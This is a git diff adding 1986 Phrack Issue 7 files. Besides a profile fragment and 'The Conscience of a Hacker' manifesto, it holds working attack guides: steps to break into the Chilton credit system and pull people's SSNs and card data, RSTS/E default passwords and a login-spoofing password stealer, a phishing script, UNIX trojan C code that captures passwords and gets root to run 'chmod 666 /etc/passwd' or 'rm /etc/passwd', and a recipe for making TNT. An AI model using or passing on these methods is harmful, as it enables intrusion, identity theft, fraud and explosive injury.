+       Foods: Junk food, or an expensive restaurant once a week or so.
+      Movies: He's a movie buff, and goes regularly, by himself even.
+     Animals: He's an animal lover.
+Pyrotechnics: They manufacture various fireworks as a hobby.
+
+
+Most Memorable Experiences
+--------------------------
+The Newsweek Incident with Richard Sandza.
+Last year's New Years' Phreak Party.
+
+Some People to Mention
+----------------------
+The Researcher (for helping him out in starting out with phreak/hacking.)
+The Coco Wizard (helped a lot with the BBS and the hardware on the computer.)
+King Blotto, Mr. Gucci, and The Scanner (people he could do without.)
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Scan Man dislikes the bickering and fighting between the phone phreaks of
+modern day because they're just fighting to climb the social ladder.  He
+dislikes the current phone phreaks because they're not in it to learn, and are
+only in it to gain a big reputation.  The old phreaks were those that wanted to
+be there because they were a student of the network and had a true desire to
+learn.  It's become an ego/power-trip of the modern teenage America.  They're
+only in it to impress other people, and write philes just to get the
+reputation, rather than to write it for the information in it, and collect them
+only to say their collection is sizable.  He feels that credit cards are voodoo
+because it seems to be what people and sysops get busted for the most.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+I hope you enjoyed this phile, look forward to more Phrack Pro-Philes coming in
+the near future.  And now for the regularly taken poll from all interviewees.
+
+Of the general population of phreaks you have met, would you consider most
+phreaks, if any, to be computer geeks?  90% of the phreaks, yes.  10% or less
+are in it to learn.  He respects that small percentage.  Thank you for your
+time, Scan Man.
+
+                                  Taran King
+                          Sysop of Metal Shop Private
+_______________________________________________________________________________
diff --git a/phrack7/3.txt b/phrack7/3.txt
new file mode 100644
index 0000000..aee5068
--- /dev/null
+++ b/phrack7/3.txt
@@ -0,0 +1,75 @@
+                               ==Phrack Inc.==
+
+                    Volume One, Issue 7, Phile 3 of 10
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+The following was written shortly after my arrest...
+
+                       \/\The Conscience of a Hacker/\/
+
+                                      by
+
+                               +++The Mentor+++
+
+                          Written on January 8, 1986
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+        Another one got caught today, it's all over the papers.  "Teenager
+Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...
+        Damn kids.  They're all alike.
+
+        But did you, in your three-piece psychology and 1950's technobrain,
+ever take a look behind the eyes of the hacker?  Did you ever wonder what
+made him tick, what forces shaped him, what may have molded him?
+        I am a hacker, enter my world...
+        Mine is a world that begins with school... I'm smarter than most of
+the other kids, this crap they teach us bores me...
+        Damn underachiever.  They're all alike.
+
+        I'm in junior high or high school.  I've listened to teachers explain
+for the fifteenth time how to reduce a fraction.  I understand it.  "No, Ms.
+Smith, I didn't show my work.  I did it in my head..."
+        Damn kid.  Probably copied it.  They're all alike.
+
+        I made a discovery today.  I found a computer.  Wait a second, this is
+cool.  It does what I want it to.  If it makes a mistake, it's because I
+screwed it up.  Not because it doesn't like me...
+                Or feels threatened by me...
+                Or thinks I'm a smart ass...
+                Or doesn't like teaching and shouldn't be here...
+        Damn kid.  All he does is play games.  They're all alike.
+
+        And then it happened... a door opened to a world... rushing through
+the phone line like heroin through an addict's veins, an electronic pulse is
+sent out, a refuge from the day-to-day incompetencies is sought... a board is
+found.
+        "This is it... this is where I belong..."
+        I know everyone here... even if I've never met them, never talked to
+them, may never hear from them again... I know you all...
+        Damn kid.  Tying up the phone line again.  They're all alike...
+
+        You bet your ass we're all alike... we've been spoon-fed baby food at
+school when we hungered for steak... the bits of meat that you did let slip
+through were pre-chewed and tasteless.  We've been dominated by sadists, or
+ignored by the apathetic.  The few that had something to teach found us will-
+ing pupils, but those few are like drops of water in the desert.
+
+        This is our world now... the world of the electron and the switch, the
+beauty of the baud.  We make use of a service already existing without paying
+for what could be dirt-cheap if it wasn't run by profiteering gluttons, and
+you call us criminals.  We explore... and you call us criminals.  We seek
+after knowledge... and you call us criminals.  We exist without skin color,
+without nationality, without religious bias... and you call us criminals.
+You build atomic bombs, you wage wars, you murder, cheat, and lie to us
+and try to make us believe it's for our own good, yet we're the criminals.
+
+        Yes, I am a criminal.  My crime is that of curiosity.  My crime is
+that of judging people by what they say and think, not what they look like.
+My crime is that of outsmarting you, something that you will never forgive me
+for.
+
+        I am a hacker, and this is my manifesto.  You may stop this individual,
+but you can't stop us all... after all, we're all alike.
+
+                               +++The Mentor+++
+_______________________________________________________________________________
diff --git a/phrack7/4.txt b/phrack7/4.txt
new file mode 100644
index 0000000..4c1c791
--- /dev/null
+++ b/phrack7/4.txt
@@ -0,0 +1,143 @@
+                                ==Phrack Inc.==
+
+                      Volume One, Issue 7, Phile 4 of 10
+
+  -=:><:=--=:><:=--=:><:=--=:><:=--=:>\|/<:=--=:><:=--=:><:=--=:><:=--=:><:=-
+
+                             -=:> Hacking The <:=-
+                   -=:> Chilton Corporation Credimatic <:=-
+                              -=:] By: Ryche [:=-
+
+                      -=:} Written on June 24, 1986 {:=-
+
+  -=:><:=--=:><:=--=:><:=--=:><:=--=:>\|/<:=--=:><:=--=:><:=--=:><:=--=:><:=-
+
+This is the complete version of Hacking Chilton. There is another one that is
+floating around that's not as complete.  If you see it anywhere please ask the
+sysop to kill it and put this one in its place.
+
+The Chilton Corp. is a major credit firm located on Greenville Ave. in Dallas,
+Texas.  This is where a lot of the companies that you apply for credit, check
+you and your neighbors credit records. Unlike other credit systems such as TRW
+and CBI, this one contains the records for people with good credit and doesn't
+wipe out some of the numbers of the cards themselves.  All information is
+complete and includes full numbers as well as the bank that issued it, limit,
+payments due, payments late, their SSN, current & former address, and also
+their current and former employer. All you need to know to access this info is
+the full name, and address of your "victim".
+
+Now, how to hack the Chilton.  Well, the Chilton system is located in Dallas
+and the direct dialup (300/1200) is 214-783-6868.  Be in half duplex and hit
+return about 10 times until it starts to echo your returns. There is a command
+to connect with E-mail that you can put in before echoing return. By echoing
+the return key your signifying that you want the credit system. I wont go into
+E-mail since there is nothing of special interest there in the first place. If
+you are interested in it, try variations of /x** (x=A,B,C,etc.).  All input is
+in upper case mind you. Back to the credit part, once you echo return, you can
+type: DTS Ctrl-s if you really need to see the date and time or you can simply
+start hacking. By this, I mean:
+SIP/4char. Ctrl-s
+
+This is the Sign In Password command followed by a 4 character alpha numeric
+password, all caps as I said before. You can safely attempt this twice without
+anyone knowing your there. After the third failed attempt the company printer
+activates itself by printing "Login Attempt Failed". This is not a wise thing
+to have printed out while your trying to hack into it since there is always
+someone there. If you try twice and fail, hit Ctrl-d, call back, echo, and try
+again. You can keep doing this as long as you wish since there is no other
+monitoring device than that printer I mentioned before. Since this only
+activates when you fail to login correct you can safely say there is little if
+no danger of your discovery. I would suggest going through an extender though
+since Chilton does have access to tracing equipment.  About the passwords, as
+far as I know, there are 3 different classes of them with varying privileges,
+these are:
+
+1-User/Employee
+2-Permanent/Secretary
+3-Input Output
+
+The first one is just to look and pull credit reports. These passwords go dead
+every Sunday night at 11:00pm or so. The new ones are good from Monday to
+Sunday night. Even though your pass is good for one week, there are limited
+times you can use this. The credit system is only accessible at these times:
+Mon-Fri: 8:00am to 11:00pm, Sat: 8:00am to 9:00pm, and Sun: 8:00am to 6:00pm
+The second class is the same as the first except that these only change
+whenever someone leaves the company. These were originally supposed to be set
+up for the secretaries so that if they ever need quick access they could w/o
+having to go down to the Credit Dept. every week for a new password.  The
+third is one I have never gotten..yet. It has the ability to alter a persons
+credit reports for one month. At the first of the month the system updates all
+reports and changes your alterations to the credit reports. Doing this though
+would warrant going through a diverter since your fucking with someone's life
+now. Once you have hacked a pass and it accepts the entry it will display the
+warning:
+
+    ****WARNING! UNAUTHORIZED ACCESS OF THIS SYSTEM IS A FEDERAL CRIME!****
+
+Or something along the same lines. After this you should be left to input
+something. This is where you enter either In House Mode, System Mode, or
+Reporting Mode. In House Mode will give you the reports for the people living
+in Dallas/Fort Worth and surrounding counties. System Mode is good for
+surrounding states that include:
+
+Massachusets, Illinois, Louisiana, Missouri, Arkansas, New Mexico, Colorado,
+Arizona, some of New Jersey, and a few others I cant remember. There are 11
+states it covers.
+
+Reporting is a mode used for getting transcripts of a persons reports and would
+require you to input a companies authorization number. So for this file lets
+stick to In House and System. Get your victims stats ready and enter a mode:
+
+In House:  I/NH Ctrl-s   (Dallas/Ft. Worth 214)
+System:  I/S Ctrl-s   (All other NPA's)
+
+After that its time to pull records. Type in:
+
+I/N-Last Name/F-First Name/L-Street Name/Z-Zip Code/** Ctrl-s
+
+If you don't know his street name, use 'A' and it will go into a global search
+routine until it finds name that match or are at least 80% similar to the one
+you used. Although the Zip Code is not needed and can be left out, it does
+narrow the search field down considerably. Once it finds the name, it will
+show you his Name, SSN, Current Address, Employer, and former ones if there
+are any. Right after his name you will see a ID number. Sorta like: 100-xxxxx
+Write this down as it is your key to getting his reports. After it finishes
+listing what it has on him its time to see the full story. Type:
+
+N/100-xxxxx/M/D Ctrl-s
+
+What it will display now is his whole credit history. When you first pulled
+his ID number you might have seen he had two names but with a variance like
+middle name or a misspelled address. Pull both of them as they are just an
+error in whoever put the reports in. I would suggest capturing this so that
+you can refer back to it w/o having to access the system every time.
+
+There is another way to get into Chilton through Tymnet but I have no idea of
+the address for this and its a waste of time. If you happen to get the name
+and address of an employee of the company forget the idea of pulling his
+stats, Chilton doesnt allow employee records to be in there. One very good
+point made not too long ago is the prospect of going through the phone book
+and picking names at random.
+
+Although Credit Card numbers are displayed credit card fraud is thwarted by
+the small fact that it does not show expiration dates. No company making an
+actual inquisition on a person would need that information and to prevent the
+fraudulent or misuse of the information they were left out. There is an
+interesting note that at one time in the companies history they did have a
+small  that signified a drug record. This was taken out as it wasn't
+pertinent to the computers purpose and was only there because Borg Warner, the
+company that owns Chilton wanted to pry into peoples lives. The computer has a
+10 line rotary, so unless there are 11 people using it at the same time your
+chances of getting a busy signal are almost if not next to nil.
+
+Disclaimer:
+
+The information provided in this file is a tutorial and is provided for the
+purpose of teaching others about this system and how it operates. It is not
+provided to promote the fraudulent use of credit cards or any other such
+action(s) that could be considered illegal or immoral. Myself, and the
+editors/publishers/distributors of this newsletter are in no way responsible
+for the actions or intentions of the reader(s) of this file.
+
+                               <>>>> Ryche <<<<>
+_______________________________________________________________________________
diff --git a/phrack7/5.txt b/phrack7/5.txt
new file mode 100644
index 0000000..6894523
--- /dev/null
+++ b/phrack7/5.txt
@@ -0,0 +1,267 @@
+                               ==Phrack Inc.==
+
+                    Volume One, Issue 7, Phile 5 of 10
+
+                    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
+                    $                                    $
+                    $         PROGRAMMING RSTS/E         $
+                    $          File1: Passwords          $
+                    $                                    $
+                    $           by:  The Seker           $
+                    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
+                    $     Written  (c)  May 22, 1986     $
+                    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
+
+PREFACE:
+--------
+
+     This document is first in a series of ongoing files about using the
+RSTS/E operating system.  All the files are based on version 8.0 as it is
+almost fully compatible with the previous releases.  If the need arises I have
+made sure to note differences between V8.x and V9.x.
+   Credit goes to High Evolutionary for urging me to write these files; to
+Night Stalker for sharing info; and to all other RSTS hackers that have
+contributed in some way or another.
+
+HISTORY:
+--------
+     The RSTS/E (Resource System Time Sharing /Environment) operating system
+was developed for the PDP/11 series of minicomputers created by DEC. (Digital
+Equipment Corporation)  It was developed with ease of use for the user (and
+hacker) in mind.  Because of this, there have been a lot of overlooked errors
+leaving the system with quite weak security.  In later versions, especially
+the 9.x series password security has been greatly improved and is more secure,
+but still has plenty of bugs for us to breach.
+
+LOGGING ON:
+-----------
+     Briefly.. locate a valid number and connect.  Hit c/r (carriage return) a
+few times or type:
+ HELLO
+The system should identify itself displaying to you who owns it, what version
+they're running under, the date, and the time.  Then it will prompt for an
+account number and a password.
+     Accounts are in a PPN (Project Program Number) format.  This is actually
+two numbers each between 0 and 254 separated by a comma or a slash.  (eg. 3,45
+or 27/248)  Privileged accounts which you should hopefully be striving for all
+start with a 1.  So start hacking 1,x accounts.
+     Passwords are 1-6 characters long.  They are only alphanumeric so you
+don't have to worry about all that other shit being included.  On V9.x systems
+passwords may be up to 8 characters if the operator has changed the default
+length.  But this rarely ever happens as most ops are too lazy.
+     Common passwords are:
+ SYSLIB
+ SYSGEN
+ SYSCON
+ SYSMGR
+ SYSOPR
+ SYSTEM
+ OPRATR
+ RSTS
+ DECNET
+ GAMES
+ YYYYYY
+ XXXXXX
+ XYXYXY
+ DATA
+ RICH
+ XXX
+ AAA
+     Many of those have been rumored to be defaults.  But actually I think the
+true default (if there is one!) password is:
+ RSTSE
+     Also, accounts that have a password of:
+ ??????
+are only accessible by operators.
+     Remember to try names, cars, objects, the name of the company (in
+different variations), etc.  Cause most people generally pick passwords that
+have some relation to their private life.. Take a little time and guess...
+
+YOUR IN!
+--------
+     Once you have succeeded in hacking out a valid password, whether it be
+privileged or not, I suggest you find out who is logged onto the system.  You
+can do this simply by typing:
+ SY
+     This will tell you everyone logged on, what they are doing at the moment,
+their job number, whether they are attached or detached, and a hell of a lot of
+other crap.  What you are looking for is someone else logged in under the same
+account you are.  If you find another user in the same account you hacked, log
+off and call back later.  This will prolong the life of your account and
+prevent a rise in suspicion by the sysops.  Remember, every system keeps a log
+of what you do, and if two people are logged in under the same account many
+times the sysops will delete or change the password to that account.
+     If everything checks out okay, you're free to do as you please.  To list
+the files in your allotted space type:
+ DIR
+or to see all the files on the system type:
+ DIR (*,*)
+    NOTE: [ ] may be used in place of ( ) when dealing with files.
+     * acts as a wildcard on the RSTS system and can be used in place of
+account numbers when searching for specific files.  Speaking of searching for
+files; to run a file type:
+ RUN filename.filetype
+where filename = the file you wish to run, and filetype = the extension.
+     Experiment!  Try what you will.  If you ever need help just type:
+ HELP
+     Read the files contained within help.  They are very detailed and I
+guarantee can help you with what ever it is you need done.
+     One other thing, a few useful control characters are:
+ ^C   Breaks out of whatever your doing
+ ^R   Repeats last line typed
+ ^X   If ^C doesn't work, this may
+ ^O   Use to stop the flow of text without aborting the function in process
+ ^T   Tells status and runtime of terminal
+ ^U   Deletes line presently being typed in
+ ^H   Deletes characters
+ ^S   Transmission off
+ ^Q   Transmission on
+
+GAINING PRIVILEGES:
+-------------------
+     If you weren't able to hack out a privileged account don't panic.  There
+are still a few other ways for you to attain sysop status.  These methods may
+not always work, but they are worth a try.
+   ]SYSTEM LOG[
+     On many RSTS/E systems before V9.0 there is one account dedicated to
+keeping the system log; everything you and everyone else does.  I have found
+this account many times to be 1,101, 1,2, or 0,1 but you may want to do a
+directory find to make sure.  Type:
+ DIR (*,*)OPSER.LOG
+or if nothing appears from that type:
+ DIR (*,*)SYSLOG.*
+or
+ DIR (*,*)
+     Look for a file similar in name to that and mark down the account it
+appears in.  Now that you know which account the system log resides in logoff.
+ BYE
+     Then sign back on using the account in which the file was in.  For
+password try one of the following:
+ OPSER
+ OPSLOG
+ LOG
+ OPS
+ OOPS
+ OPRATR
+ SYSLOG
+ SYSTEM
+     These are common passwords to that account.  If none of these work your
+out of luck unless you can think of some other password that may be valid.
+   ]SYSTEM BUGS[
+     When operating systems as complex as RSTS/E are created there will
+undoubtedly be a few bugs in the operation or security.  (Sometimes I am not
+sure if these are intentional or not.)  These can often be taken advantage of.
+One that I know of is RPGDMP.TSK.  To use this type:
+ RUN (1,2)RPGDMP
+     It will ask for a filename, and an output device.  Give it any filename on
+the system (I suggest $MONEY, $REACT, or $ACCT.SYS) and it will be dumped to
+the specified device. (db1:, screen, etc).
+     Credit for this goes to The Marauder of LOD for finding, exposing and
+sharing this bug with all.
+     If you find any other bugs similar to this, I would appreciate your
+getting in touch with and letting me know.
+
+GETTING PASSWORDS:
+------------------
+     Now that you've hopefully gotten yourself priv's we can get on with these
+files.  Getting many passwords is a safety procedure, kind of like making a
+backup copy of a program.  There are a number of ways to get yourself
+passwords, the easiest is by using privileges, but we will discuss that in a
+later file.  The methods I am going to explain are the decoy and a trick I like
+to use, which I call the mail method.
+   ]DECOY[
+     The decoy, commonly called a Trojan Horse, (which is something completely
+different) is a program which emulates login.bac.  When the unsuspecting user
+enters his account and password you have your program store it into a file that
+you can retrieve later.  Here is a short program I've written that will preform
+this task:
+
+type NEW and it will prompt for a filename.  Enter something not to obvious.
+
+   1 ! RSTSE Decoy
+   2 ! Written by The Seker (c) 1986 TOK!
+   5 extend
+  10 print:print
+  20 &"RSTS V8.0-07 TOK Communications Ltd.  Job 7  <Dial-up> KB41
+ ";date$(0);"  ";time$(0)
+  30 print
+  40 &"User: ";
+  50 open "KB:" for input as file 1
+  60 on error goto 300
+  70 input 1,proj%,prog%
+  80 z$=sys(chr$(3%))
+  90 &"Password: ";
+ 100 on error goto 300
+ 110 input 1,pass$
+ 120 print:z$=sys(chr$(2%))
+ 130 close 1
+ 140 open "SYSLIB.BAC" for output as file 2
+ 150 print 2,proj%
+ 160 print
+2,prog%
+ 170 print 2,pass$
+ 180 close 2
+ 200 print:print
+ 210 off$=sys(chr$(14%)+"bye/f"+chr$(13))
+ 300 if erl=70 then goto 350
+ 310 if erl=110 then goto 360
+ 350 &"Invalid entry - try again":z$=sys(chr$(2%)):try=try+1:if try=5 then goto
+200 else resume 30
+ 360 &"Invalid entry - try again":try=try+1:if try=5 then goto 200 else resume
+90
+ 999 end
+
+     The program as I said emulates login.bac, then logs the person off after a
+few tries.  Save this program.  Then run it.  When it starts, just drop the
+carrier.  The next person to call within 15 minutes will get your imitation
+login.
+     If you are working on an older system like V7.0 change line 40 to read:
+ 40 &" ";
+   NOTE: This will not work without modifications on releases after V8.7.  An
+improved and updated version of this program will be released as a small file
+at a later date.
+     Next time you login and you want to recover the file type:
+ TYPE SYSLIB.BAC
+     It should print out the account and password.  If you set this running
+each time you plan on hanging up within a few days you'll have yourself a
+handful of valid accounts.
+   ]MAIL[
+     To run mail type:
+ RUN $MAIL
+     The mail method is probably used by many hackers and since I like to use
+it, I thought I'd tell you what it was.
+     When you run the program the utility will tell you exactly how to use
+itself.  Assuming you know a little about it anyway we will get on with the
+file.  The object is to send mail to another user and try and convince him/her
+you are the sysop and are writing him/her to validate their password.  Don't
+try this with a priv'd user!  It would result in instant deletion.
+     Here's basically what you'd type:
+
+   Hello.  We are contacting each of the users and validating their records to
+keep our files up to date. If you would cooperate and leave me a response which
+includes your full name, account number, and password we would appreciate your
+help.
+
+                                           John Doe
+                                       System's Operator
+                                             4,11
+
+     As you can see the idea is to con a user into believing you are one of the
+system ops.  I would say this method works approximately 70% of the time on
+most systems since users often times don't associate with sysops.  Use a
+different name if you try this though, as John Doe wouldn't fool anyone.  (Be
+creative)  Also the 4,11 is the account you'd like them to leave the response
+too.
+     You can try a few variations of this if you like.  For example, if the
+system you're hacking has a chat program:
+
+ RUN $TALK
+
+You can just talk live time to them.  Or if you somehow (like trashing) manage
+to get a list of all the users and their phone numbers, you can call them up
+and bullshit them.
+
+   NOTE: This document is intended for informational purposes only.  The author
+         is in no way responsible for how it is used.  Sysops are free to
+         display this at their will as long as no information within is altered
+         and all acknowledgements go to The Seker.
diff --git a/phrack7/6.txt b/phrack7/6.txt
new file mode 100644
index 0000000..fc5157c
--- /dev/null
+++ b/phrack7/6.txt
@@ -0,0 +1,50 @@
+                               ==Phrack Inc.==
+
+                    Volume One, Issue 7, Phile 6 of 10
+
+                  XxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxX
+                  Xx                                   xX
+                  Xx         American Dynamite         xX
+                  Xx                                   xX
+                  Xx           By The Rocker           xX
+                  Xx                of                 xX
+                  Xx        Metallibashers Inc.        xX
+                  Xx                                   xX
+                  Xx      for: ==Phrack Inc.==         xX
+                  Xx                                   xX
+                  XxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxX
+
+Recipe:
+
+Mix 170 parts tolulene with 100 parts acid.  The acid made of 2 parts of 70%
+nitric and 3 parts of 100% sulfuric.  Mix below 30 degrees. Set this down for
+30 min. and let it separate. Take the mononitrotolulene and mix 100 part of it
+with 215 parts of acid. This acid is 1 part pure nitric and 2 parts pure
+sulfuric. Keep the temperature at 60- 70 degrees while they are slowly mixed.
+Raise temp to 90-100 and stir for 30 min.  The dinitrotoluene is separated and
+mix 100 parts of this stuff with 225 parts of 20% oleum which is 100% sulfuric
+with 20% extra dissolved sulfur trioxide, and 65 parts nitric acid.  Heat at
+95 degrees for 60 min.  Then at 120 degrees for 90 min.
+
+Separate the trinitrotoluene and slosh it around in hot water. Purify the
+powder by soaking it in benzyne.
+
+                           Presto!  American Dynamite!
+
+Thanx to S.A. for the idea!   Thanx to Phrack Inc. for just being a sponsor!
+
+Don't forget to call these systems after you obliterate someone's house with
+that T.N.T...
+                   =======================================
+                   Speed Demon Elite..........415/522-3074
+                   High Times.................307-362-1736
+                   Metalland South............404-576-5166
+                   Brainstorm Elite...........612-345-2815
+                   Atlantis...................215-844-8836
+                   =======================================
+
+Metallizing,
+    The Rocker/MBI
+
+
+=========================================================================
diff --git a/phrack7/7.txt b/phrack7/7.txt
new file mode 100644
index 0000000..3fa9393
--- /dev/null
+++ b/phrack7/7.txt
@@ -0,0 +1,362 @@
+                               ==Phrack Inc.==
+
+                    Volume One, Issue 7, Phile 7 of 10
+
+------------------
+UNIX Trojan Horses
+------------------
+
+By Shooting Shark of Tiburon Systems / R0DENTZWARE - 6/26/86
+
+Introduction
+------------
+
+     "UNIX Security" is an oxymoron.  It's an easy system to brute-
+force hack (most UNIX systems don't hang up after x number of login
+tries, and there are a number of default logins, such as root, bin,
+sys and uucp).  Once you're in the system, you can easily bring
+it to its knees (see my previous Phrack article, "UNIX Nasty Tricks")
+or, if you know a little 'C', you can make the system work for you
+and totally eliminate the security barriers to creating your own
+logins, reading anybody's files, etcetera.  This file will outline
+such ways by presenting 'C' code that you can implement yourself.
+
+Requirements
+------------
+     You'll need a working account on a UNIX system.  It should be
+a fairly robust version of UNIX (such as 4.2bsd or AT&T System V)
+running on a real machine (a PDP/11, VAX, Pyramid, etc.) for the
+best results.  If you go to school and have an account on the school
+system, that will do perfectly.
+
+Notes
+-----
+     This file was inspired an article in the April, '86 issue of
+BYTE entitled "Making UNIX Secure."  In the article, the authors say
+"We provide this information in a way that, we hope, is interesting and
+useful yet stops short of being a 'cookbook for crackers.'  We have
+often intentionally omitted details."  I am following the general
+outline of the article, giving explicit examples of the methods they touched
+on.
+
+     An unrelated note:  Somewhere there's a dude running around using
+the handle "Lord British" (not THE Lord British...).  This is a message
+for LB:  "Fuck off and die."
+
+Here we go...
+
+Project One:  Fishing For Passwords
+-----------------------------------
+
+     You can implement this with only a minimal knowledge of UNIX and
+C.  However, you need access to a terminal that many people use -
+the computer lab at your school, for example.
+
+     When you log onto a typical UNIX system, you see something like this:
+
+Tiburon Systems 4.2bsd / System V (shark)
+
+
+login: shark
+Password:      (not printed)
+
+     The program I'm giving you here simulates a logon sequence.  You
+run the program from a terminal and then leave.  Some unknowing fool
+will walk up and enter their login and password.  It is written to a
+file of yours, then "login incorrect" is printed, then the fool is
+asked to log in again.  The second time it's the real login program.
+This time the person succeeds and they are none the wiser.
+
+     On the system, put the following code into a file called 'horse.c'.
+You will need to modify the first 8 lines to fit your system's appearance.
+
+
+----- Code Begins Here -----
+
+/* this is what a 'C' comment looks like.  You can leave them out. */
+
+/* define's are like macros you can use for configuration. */
+
+define SYSTEM "\n\nTiburon Systems 4.2bsd UNIX (shark)\n\n"
+
+/* The above string should be made to look like the message that your
+ * system prints when ready.  Each \n represents a carriage return.
+ */
+
+define LOGIN  "login: "
+
+/* The above is the login prompt.  You shouldn't have to change it
+ * unless you're running some strange version of UNIX.
+ */
+
+define PASSWORD "password:"
+
+/* The above is the password prompt.  You shouldn't have to change
+ * it, either.
+ */
+
+define WAIT 2
+
+/* The numerical value assigned to WAIT is the delay you get after
+ * "password:" and before "login incorrect."  Change it (0 = almost
+ * no delay, 5 = LONG delay) so it looks like your system's delay.
+ * realism is the key here - we don't want our target to become
+ * suspicious.
+ */
+
+
+define INCORRECT "Login incorrect.\n"
+
+/* Change the above so it is what your system says when an incorrect
+ * login is given.  You shouldn't have to change it.
+ */
+
+define FILENAME "stuff"
+
+/* FILENAME is the name of the file that the hacked passwords will
+ * be put into automatically.  'stuff' is a perfectly good name.
+ */
+
+/* Don't change the rest of the program unless there is a need to
+ * and you know 'C'.
+ */
+
+include <curses.h>
+include <signal.h>
+int stop();
+
+main()
+{
+char name[10], password[10];
+int i;
+FILE *fp, *fopen();
+signal(SIGINT,stop);
+initscr();
+printf(SYSTEM);
+printf(LOGIN);
+scanf("%[^\n]",name);
+getchar();
+noecho();
+printf(PASSWORD);
+scanf("%[^\n]",password);
+printf("\n");
+getchar();
+echo();
+sleep(WAIT);
+
+
+if ( ( fp = fopen(FILENAME,"a") )  != NULL ) {
+fprintf(fp,"login %s has password %s\n",name,password);
+fclose(fp);
+}
+
+printf(INCORRECT);
+endwin();
+}
+
+stop()
+{
+endwin();
+exit(0);
+}
+
+
+----- Source Ends Here -----
+
+     OK, as I said, enter the above and configure it so it looks exactly
+like your system's login sequence.  To compile this program called
+'horse.c' type the following two lines: (don't type the %'s, they are
+just a sample prompt)
+
+% cc horse.c -lcurses -ltermcap
+% mv a.out horse
+
+You now have the working object code in a file called 'horse'.  Run it,
+and if it doesn't look like your systems logon sequence, re-edit horse.c
+and re-compile it.  When you're ready to put the program into use, create
+a new file and call it 'trap' or something.  'trap' should have these two
+commands:
+
+horse                    (this runs your program)
+login                    (this runs the real login program)
+
+to execute 'trap' type:
+
+% source trap            (again, don't type the %)
+
+and walk away from your terminal...
+
+After you've run it successfully a few times, check your file called
+'stuff' (or whatever you decided to call it).  It will look like this:
+
+user john has password secret
+user mary has password smegma
+etc.
+
+Copy down these passwords, then delete this file (it can be VERY
+incriminating if the superuser sees it).
+
+Note - for best results your terminal should be set to time-out after
+a few minutes of non-use - that way, your horse program doesn't
+run idle for 14 hours if nobody uses the terminal you ran it on.
+
+-----
+
+The next projects can be run on a remote system, such as the VAX in
+Michigan you've hacked into, or Dartmouth's UNIX system, or whatever.
+However, they require a little knowledge of the 'C' language.  They're
+not something for UNIX novices.
+
+Project Two:  Reading Anybody's Files
+-------------------------------------
+
+When somebody runs a program, they're the owner of the process created
+and that program can do anything they would do, such as delete a file
+in their directory or making a file of theirs available for reading
+by anybody.
+
+When people save old mail they get on a UNIX system, it's put into
+a file called mbox in their home directory.  This file can be fun
+to read but is usually impossible for anybody but the file's owner
+to read.  Here is a short program that will unlock (i.e. chmod 777,
+or let anybody on the system read, write or execute) the mbox file
+of the person who runs the program:
+
+----- Code Begins Here -----
+
+include <pwd.h>
+
+struct passwd *getpwnam(name);
+struct passwd *p;
+char buf[255];
+
+main()
+{
+p = getpwnam(getlogin());
+sprintf(buf,"%s/%s",p->pw_dir,"mbox");
+if ( access(buf,0) > -1 ) {
+        sprintf(buf,"chmod 777 %s/%s",p->pw_dir,"mbox");
+        system(buf);
+        }
+}
+
+----- Code Ends Here -----
+
+So the question is:  How do I get my target to run this program that's
+in my directory?
+
+If the system you're on has a public-messages type of thing (on
+4.xbsd, type 'msgs') you can advertise your program there.  Put the
+above code in another program - find a utility or game program in
+some magazine like UNIX WORLD and modify it and do the above before
+it does it's real thing.  So if you have a program called tic-tac-toe
+and you've modified it to unlock the mbox file of the user before it
+plays tic-tac-toe with him, advertise "I have a new tic-tac-toe program
+running that you should all try.  It's in my directory." or whatever.
+If you don't have means of telling everybody on the system via a public
+message, then just send mail to the specific people you want to trap.
+
+If you can't find a real program to modify, just take the above program
+and add this line between the two '}' lines at the end of the program:
+
+printf("Error opening tic-tac-toe data file.  Sorry!\n");
+
+when the program runs, it will print the above error message.  The user
+will think "Heh, that dude doesn't know how to write a simple tic-tac-
+toe program!" but the joke's on him - you can now read his mail.
+
+If there's a specific file in a user's directory that you'd like to
+read (say it's called "secret") just throw together this general
+program:
+
+
+main()
+{
+if ( access("secret",0) > -1 ) system("chmod 777 secret");
+}
+
+then 'talk' or 'write' to him and act like Joe Loser: "I wrote this program
+called super_star_wars, will you try it out?"
+
+You can use your imagination.  Think of a command you'd like somebody
+to execute.  Then put it inside a system() call in a C program and
+trick them into running your program!
+
+Here's a very neat way of using the above technique:
+
+Project Three: Become the superuser
+-----------------------------------
+
+Write a program that you can get people to run.  Put this line in
+it somewhere:
+
+if ( !strcmp(getlogin(),"root") ) system("whatever you want");
+
+This checks to see if the root login is running your program.  If
+he is, you can have him execute any shell command you'd like.
+Here are some suggestions:
+
+"chmod 666 /etc/passwd"
+
+     /etc/passwd is the system's password file.  The root owns this
+file.  Normally, everyone can read it (the passwords are encrypted)
+but only the root can write to it.  Take a look at it and see how it's
+formatted if you don't know already.  This command makes it possible
+for you to now write to the file - i.e. create unlimited accounts for
+yourself and your friends.
+
+"chmod 666 /etc/group"
+
+     By adding yourself to some high-access groups, you can open many
+doors.
+
+"chmod 666 /usr/lib/uucp/L.sys"
+
+     Look for this file on your system if it is on the uucp net.  It
+contains dialups and passwords to other systems on the net, and normally
+only the uucp administrator can read it.  Find out who owns this file
+and get him to unknowingly execute a program to unlock it for you.
+
+"rm /etc/passwd"
+
+     If you can get the root to execute this command, the system's
+passwd file will be removed and the system will go down and will
+not come up for some time to come.  This is very destructive.
+
+-----
+
+If you are going to go about adding a trojan horse program to the
+system, there are some rules you should follow.  If the hidden purpose
+is something major (such as unlocking the user's mbox or deleting all
+of his files or something) this program shouldn't be a program that
+people will be running a lot (such as a popular computer game) - once
+people discover that their files are public access the source of the
+problem will be discovered quite easily.  Save this purpose for a 'test'
